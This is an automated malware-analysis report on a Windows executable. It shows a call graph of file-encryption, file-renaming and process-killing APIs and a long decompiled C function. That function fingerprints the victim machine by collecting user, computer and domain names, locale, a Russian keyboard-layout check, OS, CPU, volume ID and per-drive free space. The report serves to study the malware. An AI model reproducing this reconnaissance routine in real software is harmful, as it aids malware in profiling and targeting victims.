2355->2356 2364 4037d1 _memmove 2355->2364 2357 4038f6 WriteFile WriteFile WriteFile 2356->2357 2358 40392a CloseHandle VirtualFree VirtualFree VirtualFree 2356->2358 2357->2358 2358->2348 2359 40396a MoveFileW 2358->2359 2359->2348 2360 403828 VirtualAlloc 2360->2364 2361 403847 VirtualAlloc 2362 403885 VirtualFree SetFilePointer WriteFile 2361->2362 2361->2364 2363 4038c7 VirtualFree 2362->2363 2362->2364 2363->2356 2363->2364 2364->2355 2364->2356 2364->2360 2364->2361 2364->2362 2364->2363 2366 403626 VirtualAlloc lstrcpyW lstrcatW 2365->2366 2366->2341 2368 406038 GetLastError 2367->2368 2369 40606e CryptImportKey 2367->2369 2370 406045 CryptAcquireContextW 2368->2370 2371 403724 2368->2371 2372 4060f2 CryptReleaseContext LeaveCriticalSection 2369->2372 2373 406093 CryptGetKeyParam CryptEncrypt GetLastError 2369->2373 2370->2371 2374 406065 2370->2374 2371->2347 2371->2349 2372->2371 2373->2372 2375 4060ea 2373->2375 2374->2369 2375->2372 2376 408bc0 IsProcessorFeaturePresent 2377 408be6 2376->2377 2412 402c50 2413 402cda CreateThread DestroyWindow 2412->2413 2414 402c7b 2412->2414 2415 402c80 DefWindowProcW 2414->2415 2416 402c97 BeginPaint lstrlenW TextOutW EndPaint 2414->2416 2417 402d10 SendMessageW ExitThread 2378 404186 2386 404190 2378->2386 2379 404236 2381 4042d1 VirtualAlloc 2379->2381 2382 404302 VirtualFree 2379->2382 2380 4041c0 lstrcpyW lstrlenW 2380->2379 2380->2386 2381->2382 2383 4042ed wsprintfW 2381->2383 2384 407720 10 API calls 2382->2384 2383->2382 2385 40431c 2384->2385 2386->2379 2386->2380 2418 4047f8 2419 404800 lstrcmpiW 2418->2419 2420 4047f4 2419->2420 2421 40480f OpenProcess 2419->2421 2420->2419 2423 404844 Process32NextW 2420->2423 2421->2420 2422 404821 TerminateProcess CloseHandle 2421->2422 2422->2420 2423->2420 2424 404857 2423->2424 2425 404869 FindCloseChangeNotification 2424->2425 2426 40485b VirtualFree 2424->2426 2426->2425 2387 406769 2388 406770 lstrcmpW 2387->2388 2389 406813 FindNextFileW 2388->2389 2390 40678a lstrcmpW 2388->2390 2389->2388 2391 40682b FindClose 2389->2391 2390->2389 2392 4067a0 lstrcatW 2390->2392 2394 406834 2391->2394 2393 4067b3 lstrcatW 2392->2393 2397 4067cc 2392->2397 2395 4066f0 104 API calls 2393->2395 2395->2397 2396 4063b0 62 API calls 2396->2397 2397->2389 2397->2396 2398 407369 2399 407370 GetDriveTypeW 2398->2399 2407 40738e 2399->2407 2400 407397 lstrcatW lstrcatW lstrcatW GetDiskFreeSpaceW 2402 407471 lstrcatW 2400->2402 2400->2407 2401 407491 lstrlenW 2403 4074a0 2401->2403 2402->2407 2404 4074a9 VirtualAlloc 2403->2404 2405 4074e4 2403->2405 2404->2405 2406 4074c7 2404->2406 2408 4068f0 21 API calls 2406->2408 2407->2399 2407->2400 2407->2401 2409 40740a lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 2407->2409 2410 4074ce 2408->2410 2409->2407 2410->2405 2411 4074d2 VirtualFree 2410->2411 2411->2405

                                      Callgraph

                                      • Executed
                                      • Not Executed
                                      • Opacity -> Relevance
                                      • Disassembly available
                                      callgraph 0 Function_00405FC0 1 Function_00406240 2 Function_00405540 5 Function_00405C40 2->5 33 Function_00405370 2->33 37 Function_00405CF0 2->37 65 Function_00406D90 2->65 69 Function_004069A0 2->69 75 Function_00407720 2->75 81 Function_00406BA0 2->81 87 Function_004039B0 2->87 89 Function_00408B30 2->89 3 Function_00404640 4 Function_00403FC0 4->0 22 Function_00403DE0 4->22 53 Function_00405F80 4->53 5->89 6 Function_00406440 7 Function_00406640 8 Function_00406840 43 Function_004066F0 8->43 9 Function_00408BC0 10 Function_00405050 10->5 16 Function_00404FD0 10->16 25 Function_004033E0 10->25 10->37 10->89 11 Function_00402C50 12 Function_00402F50 13 Function_00405750 13->5 13->33 13->37 13->65 13->69 13->75 13->81 13->87 13->89 14 Function_00404550 14->65 14->69 14->75 14->81 14->87 15 Function_00402AD0 18 Function_00402960 15->18 19 Function_00407C60 15->19 66 Function_00402890 15->66 76 Function_00407BA0 15->76 17 Function_00404D60 59 Function_00404B10 17->59 91 Function_00404CB0 17->91 18->19 20 Function_00405E60 21 Function_00403A60 22->2 23 Function_00403AE0 23->89 24 Function_004035E0 26 Function_004084E0 24->26 27 Function_00407EE0 24->27 46 Function_00403500 24->46 50 Function_00406000 24->50 79 Function_00405EA0 24->79 94 Function_00407DB0 24->94 47 Function_00403200 25->47 67 Function_00403190 25->67 77 Function_00403320 25->77 82 Function_004032B0 25->82 28 Function_00408AE4 29 Function_00408768 30 Function_00406769 30->43 90 Function_004063B0 30->90 31 Function_00407369 35 Function_00408470 31->35 42 Function_004068F0 31->42 32 Function_004088EC 33->10 36 Function_00405270 33->36 41 Function_004077F0 33->41 52 Function_00407A00 33->52 33->89 92 Function_00404EB0 33->92 34 Function_00405EF0 54 Function_00405D80 34->54 38 Function_00403FF0 39 Function_004034F0 40 Function_00404AF0 73 Function_004048A0 40->73 42->41 42->52 43->7 43->43 62 Function_00406110 43->62 80 Function_004064A0 43->80 43->90 44 Function_004047F8 45 Function_00404880 48 Function_00402000 49 Function_00404B00 50->39 51 Function_00406300 52->41 55 Function_00404186 55->75 55->76 56 Function_00408A09 57 Function_0040878C 58 Function_0040888E 59->89 60 Function_00402D10 61 Function_00406D10 62->76 63 Function_00407C10 64 Function_00407510 65->35 65->42 65->61 74 Function_00407520 65->74 85 Function_00402830 66->85 86 Function_00403030 66->86 66->94 68 Function_00408914 70 Function_00404BA0 71 Function_004040A0 71->65 71->69 71->75 71->76 71->81 71->87 72 Function_00403BA0 72->21 72->23 73->0 73->3 73->4 73->13 73->14 73->20 73->21 73->22 73->34 73->38 73->45 73->71 73->72 73->79 83 Function_00404330 73->83 84 Function_00402D30 73->84 78 Function_004030A0 78->12 80->6 80->63 83->23 84->12 84->15 84->78 86->12 88 Function_00408730 90->1 90->24 90->51 91->70 93 Function_004084B0 91->93 92->17 95 Function_004088BC

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 406d90-406da7 1 406da9-406dc8 VirtualAlloc GetUserNameW 0->1 2 406dce-406dd2 0->2 1->2 3 406dd4-406df0 VirtualAlloc GetComputerNameW 2->3 4 406df6-406e00 2->4 3->4 5 406e02-406e17 VirtualAlloc 4->5 6 406e56-406e5a 4->6 5->6 7 406e19-406e2f call 406d10 5->7 8 406e60-406e9a VirtualAlloc RegOpenKeyExW 6->8 9 406ef5-406ef9 6->9 18 406e34-406e36 7->18 13 406e9c-406ebe RegQueryValueExW 8->13 14 406ede-406eef VirtualFree 8->14 10 407024-407028 9->10 11 406eff-406f3b VirtualAlloc * 2 9->11 15 4070d6-4070da 10->15 16 40702e-407068 VirtualAlloc RegOpenKeyExW 10->16 17 406f40-406f73 wsprintfW RegOpenKeyExW 11->17 19 406ec0-406ec7 13->19 20 406ec9 GetLastError 13->20 14->9 27 407134-407138 15->27 28 4070dc-4070fd GetNativeSystemInfo VirtualAlloc 15->28 21 40706a-40708c RegQueryValueExW 16->21 22 4070ac-4070d3 call 406d10 wsprintfW 16->22 23 406fe3-406fe8 17->23 24 406f75-406f95 RegQueryValueExW 17->24 25 406e38-406e3f 18->25 26 406e49-406e4e 18->26 29 406ecf-406edc RegCloseKey 19->29 20->29 30 407097 GetLastError 21->30 31 40708e-407095 21->31 22->15 39 406fed 23->39 32 406fa0 GetLastError 24->32 33 406f97-406f9e 24->33 25->6 36 406e41-406e47 25->36 38 406e51-406e53 wsprintfW 26->38 34 407155-407159 27->34 35 40713a-407149 call 407520 27->35 40 407129 28->40 41 4070ff-407106 28->41 29->9 29->14 43 40709d-4070aa RegCloseKey 30->43 31->43 44 406fa6-406fb3 RegCloseKey 32->44 33->44 46 4072e9 34->46 47 40715f-4071fe VirtualAlloc * 2 GetWindowsDirectoryW GetVolumeInformationW RegOpenKeyExW 34->47 54 40714e-407150 35->54 36->38 38->6 49 406ff0-406ff3 39->49 42 40712e-407131 wsprintfW 40->42 41->40 50 407122-407127 41->50 51 407114-407119 41->51 52 40711b-407120 41->52 53 40710d-407112 41->53 42->27 43->15 43->22 44->23 55 406fb5-406fc5 lstrcmpiW 44->55 56 4072ef-4072f3 46->56 57 407200-407223 RegQueryValueExW 47->57 58 40726d-4072a9 wsprintfW lstrcatW GetModuleHandleW GetProcAddress 47->58 59 406ff5-406ff7 49->59 60 406ffd-406fff 49->60 50->42 51->42 52->42 53->42 54->34 63 407152 54->63 64 406fc7-406fe1 wsprintfW 55->64 65 406fea 55->65 66 4074a0-4074a7 56->66 67 4072f9-407340 VirtualAlloc 56->67 68 407225-40722c 57->68 69 40722e GetLastError 57->69 61 4072c7 58->61 62 4072ab-4072c5 lstrlenW 58->62 59->17 59->60 70 407001-40700b wsprintfW 60->70 71 40700e-40701e VirtualFree 60->71 74 4072ce-4072e7 VirtualFree 61->74 62->74 63->34 64->49 65->39 72 4074a9-4074c5 VirtualAlloc 66->72 73 4074ee-4074f9 66->73 75 407345-407350 67->75 76 407234-407241 RegCloseKey 68->76 69->76 70->71 71->10 78 4074e4 72->78 79 4074c7-4074d0 call 4068f0 72->79 74->56 75->75 80 407352-407367 75->80 76->58 81 407243-407268 lstrlenW call 406d10 76->81 78->73 79->73 89 4074d2-4074de VirtualFree 79->89 83 407370-407388 GetDriveTypeW 80->83 81->58 86 40747b 83->86 87 40738e-407391 83->87 88 407481-40748b 86->88 87->86 90 407397-4073de lstrcatW * 3 GetDiskFreeSpaceW 87->90 88->83 91 407491-40749b lstrlenW 88->91 89->78 92 407471-407479 lstrcatW 90->92 93 4073e4-40746f call 408470 * 2 lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 90->93 91->66 92->86 93->88
                                      C-Code - Quality: 90%
                                      			E00406D90(char* __ecx) {
                                      				WCHAR* _v8;
                                      				void* _v12;
                                      				void* _v16;
                                      				void* _v20;
                                      				long _v24;
                                      				int _v28;
                                      				int _v32;
                                      				short _v36;
                                      				short _v40;
                                      				WCHAR* _v44;
                                      				WCHAR* _v48;
                                      				WCHAR* _v52;
                                      				WCHAR* _v56;
                                      				WCHAR* _v60;
                                      				WCHAR* _v64;
                                      				WCHAR* _v68;
                                      				signed short _v76;
                                      				char _v132;
                                      				void* _t182;
                                      				long _t183;
                                      				WCHAR* _t185;
                                      				short _t186;
                                      				short _t187;
                                      				short _t188;
                                      				signed int _t189;
                                      				signed int _t192;
                                      				signed int _t194;
                                      				int _t206;
                                      				void* _t209;
                                      				signed int _t211;
                                      				signed int _t214;
                                      				WCHAR* _t218;
                                      				WCHAR* _t219;
                                      				long _t228;
                                      				_Unknown_base(*)()* _t233;
                                      				long _t242;
                                      				signed int _t245;
                                      				intOrPtr _t250;
                                      				WCHAR* _t252;
                                      				WCHAR* _t254;
                                      				long _t256;
                                      				long _t260;
                                      				void* _t263;
                                      				WCHAR* _t265;
                                      				long _t268;
                                      				WCHAR* _t269;
                                      				long _t273;
                                      				void* _t278;
                                      				long _t280;
                                      				long _t283;
                                      				WCHAR* _t286;
                                      				void* _t287;
                                      				WCHAR* _t289;
                                      				WCHAR* _t290;
                                      				WCHAR* _t292;
                                      				DWORD* _t296;
                                      				char* _t300;
                                      				short* _t301;
                                      				DWORD* _t307;
                                      				signed int _t310;
                                      				void* _t314;
                                      				char* _t316;
                                      				char* _t318;
                                      				void* _t319;
                                      				void* _t320;
                                      
                                      				_t300 = __ecx;
                                      				_t318 = __ecx;
                                      				if( *__ecx != 0) {
                                      					_t292 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
                                      					_t300 =  &_v28;
                                      					 *(_t318 + 8) = _t292;
                                      					_v28 = 0x100;
                                      					GetUserNameW(_t292, _t300); // executed
                                      				}
                                      				if( *((intOrPtr*)(_t318 + 0xc)) != 0) {
                                      					_v28 = 0x1e;
                                      					_t290 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
                                      					_t300 =  &_v28;
                                      					 *(_t318 + 0x14) = _t290;
                                      					GetComputerNameW(_t290, _t300);
                                      				}
                                      				if( *((intOrPtr*)(_t318 + 0x18)) == 0) {
                                      					L11:
                                      					if( *(_t318 + 0x30) == 0) {
                                      						L18:
                                      						if( *((intOrPtr*)(_t318 + 0x3c)) == 0) {
                                      							L35:
                                      							if( *((intOrPtr*)(_t318 + 0x48)) == 0) {
                                      								L42:
                                      								if( *((intOrPtr*)(_t318 + 0x54)) == 0) {
                                      									L51:
                                      									if( *((intOrPtr*)(_t318 + 0x24)) != 0) {
                                      										_v32 = 0;
                                      										_t250 = E00407520(_t318 + 0x2c,  &_v32); // executed
                                      										if(_t250 == 0) {
                                      											 *((intOrPtr*)(_t318 + 0x24)) = _t250;
                                      										}
                                      									}
                                      									if( *((intOrPtr*)(_t318 + 0x60)) != 0) {
                                      										_t218 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                      										 *(_t318 + 0x68) = _t218;
                                      										_t219 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
                                      										_v16 = _t219;
                                      										_t81 =  &(_t219[0x306]); // 0x60c
                                      										_v8 = _t81;
                                      										GetWindowsDirectoryW(_t219, 0x100);
                                      										_t300 = _v16;
                                      										_t300[6] = 0;
                                      										_t85 =  &(_t300[0x600]); // 0x600
                                      										_t307 = _t85;
                                      										_t86 =  &(_t300[0x400]); // 0x400
                                      										_v20 = _t307;
                                      										_t88 =  &(_t300[0x604]); // 0x604
                                      										_t89 =  &(_t300[0x608]); // 0x608
                                      										_t90 =  &(_t300[0x200]); // 0x200
                                      										GetVolumeInformationW(_t300, _t90, 0x100, _t307, _t89, _t88, _t86, 0x100); // executed
                                      										_v24 = 0;
                                      										_t228 = RegOpenKeyExW(0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 0x20019,  &_v28); // executed
                                      										if(_t228 == 0) {
                                      											_t300 = _v8;
                                      											_v32 = 0x80;
                                      											_t242 = RegQueryValueExW(_v28, L"ProcessorNameString", 0, 0, _t300,  &_v32); // executed
                                      											if(_t242 != 0) {
                                      												GetLastError();
                                      											} else {
                                      												_v24 = 1;
                                      											}
                                      											RegCloseKey(_v28);
                                      											if(_v24 != 0) {
                                      												_t245 = lstrlenW(_v8);
                                      												_t300 = _v8;
                                      												_push(_t300);
                                      												E00406D10(_t300, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t300 + _t245 * 2, 0x80); // executed
                                      											}
                                      										}
                                      										wsprintfW( *(_t318 + 0x68), L"%d",  *_v20);
                                      										_t320 = _t320 + 0xc;
                                      										lstrcatW( *(_t318 + 0x68), _v8);
                                      										_t233 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
                                      										_v32 = _t233;
                                      										if(_t233 == 0) {
                                      											 *(_t318 + 0x6c) = 0;
                                      										} else {
                                      											 *(_t318 + 0x6c) = _v32(0x29a,  *(_t318 + 0x68), lstrlenW( *(_t318 + 0x68)) + _t238);
                                      										}
                                      										 *(_t318 + 0x70) =  *_v20;
                                      										VirtualFree(_v16, 0, 0x8000); // executed
                                      									}
                                      									if( *((intOrPtr*)(_t318 + 0x74)) == 0) {
                                      										L78:
                                      										if( *(_t318 + 0x80) == 0) {
                                      											L83:
                                      											return 1;
                                      										}
                                      										_t182 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
                                      										 *(_t318 + 0x84) = _t182;
                                      										if(_t182 == 0) {
                                      											L82:
                                      											 *(_t318 + 0x80) = 0;
                                      											goto L83;
                                      										}
                                      										_push(_t300);
                                      										_t183 = E004068F0(_t182); // executed
                                      										if(_t183 != 0) {
                                      											goto L83;
                                      										}
                                      										VirtualFree( *(_t318 + 0x84), _t183, 0x8000); // executed
                                      										goto L82;
                                      									} else {
                                      										_v68 = L"UNKNOWN";
                                      										_v64 = L"NO_ROOT_DIR";
                                      										_v60 = L"REMOVABLE";
                                      										_v56 = L"FIXED";
                                      										_v52 = L"REMOTE";
                                      										_v48 = L"CDROM";
                                      										_v44 = L"RAMDISK";
                                      										_t185 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
                                      										 *(_t318 + 0x7c) = _t185;
                                      										_t301 =  &_v132;
                                      										_t186 = 0x41;
                                      										do {
                                      											 *_t301 = _t186;
                                      											_t301 = _t301 + 2;
                                      											_t186 = _t186 + 1;
                                      										} while (_t186 <= 0x5a);
                                      										_t187 =  *L"?:\\"; // 0x3a003f
                                      										_v40 = _t187;
                                      										_t188 =  *0x40e308; // 0x5c
                                      										_v36 = _t188;
                                      										_t189 = 0;
                                      										_v28 = 0;
                                      										do {
                                      											_v40 =  *((intOrPtr*)(_t319 + _t189 * 2 - 0x80));
                                      											_t192 = GetDriveTypeW( &_v40); // executed
                                      											_t310 = _t192;
                                      											if(_t310 > 2 && _t310 != 5) {
                                      												_v36 = 0;
                                      												lstrcatW( *(_t318 + 0x7c),  &_v40);
                                      												_v36 = 0x5c;
                                      												lstrcatW( *(_t318 + 0x7c),  *(_t319 + _t310 * 4 - 0x40));
                                      												lstrcatW( *(_t318 + 0x7c), "_");
                                      												_t206 = GetDiskFreeSpaceW( &_v40,  &_v32,  &_v24,  &_v16,  &_v20); // executed
                                      												if(_t206 == 0) {
                                      													lstrcatW( *(_t318 + 0x7c), L"0,");
                                      													goto L75;
                                      												}
                                      												_v12 = E00408470(_v20, 0, _v32 * _v24, 0);
                                      												_t296 = _t307;
                                      												_t209 = E00408470(_v16, 0, _v32 * _v24, 0);
                                      												_t314 = _v12;
                                      												_v8 = _t314 - _t209;
                                      												asm("sbb eax, edx");
                                      												_v12 = _t296;
                                      												_t211 = lstrlenW( *(_t318 + 0x7c));
                                      												_push(_t296);
                                      												wsprintfW( &(( *(_t318 + 0x7c))[_t211]), L"%I64u/", _t314);
                                      												_t214 = lstrlenW( *(_t318 + 0x7c));
                                      												_push(_v12);
                                      												wsprintfW( &(( *(_t318 + 0x7c))[_t214]), L"%I64u", _v8);
                                      												_t320 = _t320 + 0x20;
                                      												lstrcatW( *(_t318 + 0x7c), ",");
                                      											}
                                      											_t189 =  &(1[_v28]);
                                      											_v28 = _t189;
                                      										} while (_t189 < 0x1b);
                                      										_t194 = lstrlenW( *(_t318 + 0x7c));
                                      										_t300 =  *(_t318 + 0x7c);
                                      										_t300[_t194 * 2 - 2] = 0;
                                      										goto L78;
                                      									}
                                      								}
                                      								__imp__GetNativeSystemInfo( &_v76); // executed
                                      								_t252 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
                                      								_t300 = _v76 & 0x0000ffff;
                                      								 *(_t318 + 0x5c) = _t252;
                                      								if(_t300 > 9) {
                                      									L49:
                                      									_push(L"Unknown");
                                      									L50:
                                      									wsprintfW(_t252, ??);
                                      									_t320 = _t320 + 8;
                                      									goto L51;
                                      								}
                                      								_t300 = _t300[E00407510] & 0x000000ff;
                                      								switch( *((intOrPtr*)(_t300 * 4 +  &M004074FC))) {
                                      									case 0:
                                      										_push(L"x86");
                                      										goto L50;
                                      									case 1:
                                      										_push(L"ARM");
                                      										goto L50;
                                      									case 2:
                                      										_push(L"Itanium");
                                      										goto L50;
                                      									case 3:
                                      										_push(L"x64");
                                      										goto L50;
                                      									case 4:
                                      										goto L49;
                                      								}
                                      							}
                                      							_t254 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
                                      							_v20 = _t254;
                                      							 *(_t318 + 0x50) = _t254;
                                      							_v24 = 0;
                                      							_t256 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20019,  &_v28); // executed
                                      							if(_t256 != 0) {
                                      								L41:
                                      								_push(_t300);
                                      								E00406D10(_t300, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t318 + 0x50), 0x80);
                                      								wsprintfW( *(_t318 + 0x50), L"error");
                                      								_t320 = _t320 + 8;
                                      								goto L42;
                                      							}
                                      							_v32 = 0x80;
                                      							_t260 = RegQueryValueExW(_v28, L"productName", 0, 0, _v20,  &_v32); // executed
                                      							if(_t260 != 0) {
                                      								GetLastError();
                                      							} else {
                                      								_v24 = 1;
                                      							}
                                      							RegCloseKey(_v28); // executed
                                      							if(_v24 != 0) {
                                      								goto L42;
                                      							} else {
                                      								goto L41;
                                      							}
                                      						}
                                      						_t263 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
                                      						_v16 = _t263;
                                      						_v28 = _t263 + 0xe;
                                      						_t265 = VirtualAlloc(0, 4, 0x3000, 4); // executed
                                      						 *(_t318 + 0x44) = _t265;
                                      						_t316 = 1;
                                      						_v8 = 1;
                                      						_v12 = 0;
                                      						do {
                                      							wsprintfW(_v16, L"%d", _t316);
                                      							_t320 = _t320 + 0xc;
                                      							_v24 = 0;
                                      							_t316 =  &(_t316[1]);
                                      							_t268 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v20); // executed
                                      							if(_t268 != 0) {
                                      								L27:
                                      								_t269 = 0;
                                      								_v8 = 0;
                                      								L29:
                                      								_t300 = _v12;
                                      								goto L30;
                                      							}
                                      							_v32 = 0x80;
                                      							_t273 = RegQueryValueExW(_v20, _v16, 0, 0, _v28,  &_v32); // executed
                                      							if(_t273 != 0) {
                                      								GetLastError();
                                      							} else {
                                      								_v24 = 1;
                                      							}
                                      							RegCloseKey(_v20); // executed
                                      							if(_v24 == 0) {
                                      								goto L27;
                                      							} else {
                                      								if(lstrcmpiW(_v28, L"00000419") != 0) {
                                      									_t269 = _v8;
                                      									goto L29;
                                      								}
                                      								wsprintfW( *(_t318 + 0x44), "1");
                                      								_t320 = _t320 + 8;
                                      								_t300 = 1;
                                      								_t269 = 0;
                                      								_v12 = 1;
                                      								_v8 = 0;
                                      							}
                                      							L30:
                                      						} while (_t316 != 9 && _t269 != 0);
                                      						if(_t300 == 0) {
                                      							wsprintfW( *(_t318 + 0x44), "0");
                                      							_t320 = _t320 + 8;
                                      						}
                                      						VirtualFree(_v16, 0, 0x8000); // executed
                                      						goto L35;
                                      					}
                                      					_t278 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
                                      					_v24 = _t278;
                                      					 *(_t318 + 0x38) = _t278;
                                      					_v12 = 0;
                                      					_t280 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v16); // executed
                                      					if(_t280 != 0) {
                                      						L17:
                                      						 *(_t318 + 0x30) = 0;
                                      						VirtualFree( *(_t318 + 0x38), 0, 0x8000);
                                      						goto L18;
                                      					}
                                      					_v28 = 0x40;
                                      					_t283 = RegQueryValueExW(_v16, L"LocaleName", 0, 0, _v24,  &_v28); // executed
                                      					if(_t283 != 0) {
                                      						GetLastError();
                                      					} else {
                                      						_v12 = 1;
                                      					}
                                      					RegCloseKey(_v16); // executed
                                      					if(_v12 != 0) {
                                      						goto L18;
                                      					} else {
                                      						goto L17;
                                      					}
                                      				} else {
                                      					_t286 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
                                      					 *(_t318 + 0x20) = _t286;
                                      					if(_t286 == 0) {
                                      						goto L11;
                                      					}
                                      					_push(_t300);
                                      					_t287 = E00406D10(_t300, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t286, 0x80); // executed
                                      					if(_t287 == 0) {
                                      						wsprintfW( *(_t318 + 0x20), L"undefined");
                                      						L10:
                                      						_t320 = _t320 + 8;
                                      						goto L11;
                                      					}
                                      					_t289 =  *(_t318 + 0x20);
                                      					if( *_t289 != 0) {
                                      						goto L11;
                                      					}
                                      					wsprintfW(_t289, L"WORKGROUP");
                                      					goto L10;
                                      				}
                                      			}




































































                                      0x00406d90
                                      0x00406d9b
                                      0x00406da7
                                      0x00406db7
                                      0x00406db9
                                      0x00406dbc
                                      0x00406dc1
                                      0x00406dc8
                                      0x00406dc8
                                      0x00406dd2
                                      0x00406ddf
                                      0x00406de6
                                      0x00406de8
                                      0x00406deb
                                      0x00406df0
                                      0x00406df0
                                      0x00406e00
                                      0x00406e56
                                      0x00406e5a
                                      0x00406ef5
                                      0x00406ef9
                                      0x00407024
                                      0x00407028
                                      0x004070d6
                                      0x004070da
                                      0x00407134
                                      0x00407138
                                      0x0040713d
                                      0x00407149
                                      0x00407150
                                      0x00407152
                                      0x00407152
                                      0x00407150
                                      0x00407159
                                      0x0040716d
                                      0x0040717d
                                      0x00407180
                                      0x00407188
                                      0x0040718b
                                      0x00407191
                                      0x00407194
                                      0x0040719a
                                      0x004071a4
                                      0x004071a8
                                      0x004071a8
                                      0x004071ae
                                      0x004071b4
                                      0x004071b8
                                      0x004071bf
                                      0x004071cc
                                      0x004071d4
                                      0x004071dd
                                      0x004071f6
                                      0x004071fe
                                      0x00407200
                                      0x00407214
                                      0x0040721b
                                      0x00407223
                                      0x0040722e
                                      0x00407225
                                      0x00407225
                                      0x00407225
                                      0x00407237
                                      0x00407241
                                      0x00407246
                                      0x0040724c
                                      0x0040724f
                                      0x00407268
                                      0x00407268
                                      0x00407241
                                      0x0040727a
                                      0x00407282
                                      0x0040728b
                                      0x0040729e
                                      0x004072a4
                                      0x004072a9
                                      0x004072c7
                                      0x004072ab
                                      0x004072c2
                                      0x004072c2
                                      0x004072da
                                      0x004072e1
                                      0x004072e1
                                      0x004072f3
                                      0x004074a0
                                      0x004074a7
                                      0x004074f0
                                      0x004074f9
                                      0x004074f9
                                      0x004074b7
                                      0x004074bd
                                      0x004074c5
                                      0x004074e4
                                      0x004074e4
                                      0x00000000
                                      0x004074e4
                                      0x004074c7
                                      0x004074c9
                                      0x004074d0
                                      0x00000000
                                      0x00000000
                                      0x004074de
                                      0x00000000
                                      0x004072f9
                                      0x00407307
                                      0x0040730e
                                      0x00407315
                                      0x0040731c
                                      0x00407323
                                      0x0040732a
                                      0x00407331
                                      0x00407338
                                      0x0040733a
                                      0x0040733d
                                      0x00407340
                                      0x00407345
                                      0x00407345
                                      0x00407348
                                      0x0040734b
                                      0x0040734c
                                      0x00407352
                                      0x00407357
                                      0x0040735a
                                      0x0040735f
                                      0x00407362
                                      0x00407364
                                      0x00407370
                                      0x00407375
                                      0x0040737d
                                      0x00407383
                                      0x00407388
                                      0x00407399
                                      0x004073a4
                                      0x004073b2
                                      0x004073b6
                                      0x004073c0
                                      0x004073d6
                                      0x004073de
                                      0x00407479
                                      0x00000000
                                      0x00407479
                                      0x00407400
                                      0x00407403
                                      0x00407405
                                      0x0040740a
                                      0x00407416
                                      0x00407419
                                      0x0040741b
                                      0x0040741e
                                      0x00407427
                                      0x00407438
                                      0x00407446
                                      0x00407448
                                      0x0040745a
                                      0x00407462
                                      0x0040746d
                                      0x0040746d
                                      0x00407484
                                      0x00407485
                                      0x00407488
                                      0x00407494
                                      0x00407496
                                      0x0040749b
                                      0x00000000
                                      0x0040749b
                                      0x004072f3
                                      0x004070e0
                                      0x004070f1
                                      0x004070f3
                                      0x004070f7
                                      0x004070fd
                                      0x00407129
                                      0x00407129
                                      0x0040712e
                                      0x0040712f
                                      0x00407131
                                      0x00000000
                                      0x00407131
                                      0x004070ff
                                      0x00407106
                                      0x00000000
                                      0x00407122
                                      0x00000000
                                      0x00000000
                                      0x00407114
                                      0x00000000
                                      0x00000000
                                      0x0040711b
                                      0x00000000
                                      0x00000000
                                      0x0040710d
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00407106
                                      0x0040703c
                                      0x0040703e
                                      0x00407041
                                      0x00407059
                                      0x00407060
                                      0x00407068
                                      0x004070ac
                                      0x004070ac
                                      0x004070c4
                                      0x004070d1
                                      0x004070d3
                                      0x00000000
                                      0x004070d3
                                      0x0040706d
                                      0x00407084
                                      0x0040708c
                                      0x00407097
                                      0x0040708e
                                      0x0040708e
                                      0x0040708e
                                      0x004070a0
                                      0x004070aa
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004070aa
                                      0x00406f0d
                                      0x00406f16
                                      0x00406f20
                                      0x00406f23
                                      0x00406f25
                                      0x00406f28
                                      0x00406f2d
                                      0x00406f34
                                      0x00406f40
                                      0x00406f49
                                      0x00406f4b
                                      0x00406f4e
                                      0x00406f58
                                      0x00406f6b
                                      0x00406f73
                                      0x00406fe3
                                      0x00406fe3
                                      0x00406fe5
                                      0x00406fed
                                      0x00406fed
                                      0x00000000
                                      0x00406fed
                                      0x00406f78
                                      0x00406f8d
                                      0x00406f95
                                      0x00406fa0
                                      0x00406f97
                                      0x00406f97
                                      0x00406f97
                                      0x00406fa9
                                      0x00406fb3
                                      0x00000000
                                      0x00406fb5
                                      0x00406fc5
                                      0x00406fea
                                      0x00000000
                                      0x00406fea
                                      0x00406fcf
                                      0x00406fd1
                                      0x00406fd4
                                      0x00406fd9
                                      0x00406fdb
                                      0x00406fde
                                      0x00406fde
                                      0x00406ff0
                                      0x00406ff0
                                      0x00406fff
                                      0x00407009
                                      0x0040700b
                                      0x0040700b
                                      0x00407018
                                      0x00000000
                                      0x0040701e
                                      0x00406e6e
                                      0x00406e70
                                      0x00406e73
                                      0x00406e8b
                                      0x00406e92
                                      0x00406e9a
                                      0x00406ede
                                      0x00406ee8
                                      0x00406eef
                                      0x00000000
                                      0x00406eef
                                      0x00406e9f
                                      0x00406eb6
                                      0x00406ebe
                                      0x00406ec9
                                      0x00406ec0
                                      0x00406ec0
                                      0x00406ec0
                                      0x00406ed2
                                      0x00406edc
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406e02
                                      0x00406e10
                                      0x00406e12
